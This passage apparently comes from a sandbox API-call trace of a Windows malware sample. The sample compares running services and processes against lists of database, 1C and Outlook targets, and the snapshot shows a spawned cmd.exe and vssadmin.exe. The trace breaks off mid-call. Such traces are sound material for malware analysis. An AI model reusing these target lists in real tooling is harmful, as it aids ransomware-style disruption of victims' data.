lstrlenW (lpString="WdiServiceHost") returned 14 [0038.505] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0038.505] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0038.505] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0038.505] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0038.505] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0038.505] lstrlenW (lpString="WdiSystemHost") returned 13 [0038.505] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0038.505] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0038.505] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0038.505] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0038.505] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0038.505] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0038.505] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0038.505] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0038.505] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0038.505] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0038.505] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0038.505] lstrlenW (lpString="Winmgmt") returned 7 [0038.505] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0038.505] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0038.505] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0038.505] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0038.505] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0038.505] lstrlenW (lpString="WPDBusEnum") returned 10 [0038.505] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0038.505] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0038.505] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0038.505] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0038.505] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0038.506] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5be058 | out: hHeap=0x570000) returned 1 [0038.506] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0038.508] Process32FirstW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0038.508] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0038.509] lstrlenW (lpString="System") returned 6 [0038.509] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0038.509] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0038.509] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0038.509] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0038.509] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0038.509] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0038.509] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0038.509] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0038.510] lstrlenW (lpString="smss.exe") returned 8 [0038.510] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0038.510] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0038.510] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0038.510] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0038.510] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0038.510] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0038.510] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0038.510] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0038.511] lstrlenW (lpString="csrss.exe") returned 9 [0038.511] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0038.511] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0038.511] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0038.511] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0038.511] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0038.511] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0038.511] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0038.511] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0038.511] lstrlenW (lpString="wininit.exe") returned 11 [0038.512] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0038.512] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0038.512] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0038.512] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0038.512] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0038.512] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0038.512] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0038.512] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0038.512] lstrlenW (lpString="csrss.exe") returned 9 [0038.512] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0038.512] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0038.512] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0038.512] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0038.512] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0038.513] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0038.513] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0038.513] lstrlenW (lpString="winlogon.exe") returned 12 [0038.513] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0038.514] lstrlenW (lpString="services.exe") returned 12 [0038.514] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0038.515] lstrlenW (lpString="lsass.exe") returned 9 [0038.515] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0038.515] lstrlenW (lpString="lsm.exe") returned 7 [0038.515] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.516] lstrlenW (lpString="svchost.exe") returned 11 [0038.516] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.517] lstrlenW (lpString="svchost.exe") returned 11 [0038.517] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.517] lstrlenW (lpString="svchost.exe") returned 11 [0038.517] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.518] lstrlenW (lpString="svchost.exe") returned 11 [0038.518] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.519] lstrlenW (lpString="svchost.exe") returned 11 [0038.519] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0038.519] lstrlenW (lpString="audiodg.exe") returned 11 [0038.519] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.520] lstrlenW (lpString="svchost.exe") returned 11 [0038.520] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.521] lstrlenW (lpString="svchost.exe") returned 11 [0038.521] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0038.521] lstrlenW (lpString="dwm.exe") returned 7 [0038.521] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0038.522] lstrlenW (lpString="explorer.exe") returned 12 [0038.522] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0038.523] lstrlenW (lpString="spoolsv.exe") returned 11 [0038.523] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0038.523] lstrlenW (lpString="taskhost.exe") returned 12 [0038.523] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.524] lstrlenW (lpString="svchost.exe") returned 11 [0038.524] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0038.525] lstrlenW (lpString="taskeng.exe") returned 11 [0038.525] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0038.525] lstrlenW (lpString="taskhost.exe") returned 12 [0038.525] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0038.526] lstrlenW (lpString="called.exe") returned 10 [0038.526] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0038.527] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0038.527] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0038.527] lstrlenW (lpString="analyst.exe") returned 11 [0038.527] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0038.528] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0038.528] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0038.529] lstrlenW (lpString="wages.exe") returned 9 [0038.529] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0038.529] lstrlenW (lpString="rand.exe") returned 8 [0038.529] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0038.530] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0038.530] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0038.531] lstrlenW (lpString="cottage.exe") returned 11 [0038.531] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0038.531] lstrlenW (lpString="pairs_spec.exe") returned 14 [0038.531] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0038.532] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0038.532] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0038.533] lstrlenW (lpString="observationshairy.exe") returned 21 [0038.533] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0038.533] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0038.533] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0038.534] lstrlenW (lpString="spectrum.exe") returned 12 [0038.534] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0038.535] lstrlenW (lpString="dies.exe") returned 8 [0038.535] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0038.535] lstrlenW (lpString="configured.exe") returned 14 [0038.536] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0038.536] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0038.536] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0038.537] lstrlenW (lpString="fast.exe") returned 8 [0038.537] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0038.538] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0038.538] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0038.538] lstrlenW (lpString="review.exe") returned 10 [0038.538] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0038.539] lstrlenW (lpString="historybinding.exe") returned 18 [0038.539] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0038.540] lstrlenW (lpString="pk task surge.exe") returned 17 [0038.540] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0038.713] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0038.713] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0038.714] lstrlenW (lpString="mobsync.exe") returned 11 [0038.714] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0038.715] lstrlenW (lpString="dllhost.exe") returned 11 [0038.715] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0038.715] lstrlenW (lpString="dllhost.exe") returned 11 [0038.715] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0038.716] lstrlenW (lpString="ivttvf.exe") returned 10 [0038.716] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0038.717] lstrlenW (lpString="cmd.exe") returned 7 [0038.717] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0038.718] lstrlenW (lpString="conhost.exe") returned 11 [0038.718] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0038.718] lstrlenW (lpString="vssadmin.exe") returned 12 [0038.718] Process32NextW (in: hSnapshot=0x1a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0038.719] CloseHandle (hObject=0x1a4) returned 1 [0038.719] Sleep (dwMilliseconds=0x1f4) [0039.478] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5efe18 [0039.478] EnumServicesStatusExW (in: hSCManager=0x5efe18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0039.478] GetLastError () returned 0xea [0039.478] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x123e) returned 0x5be058 [0039.478] EnumServicesStatusExW (in: hSCManager=0x5efe18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, 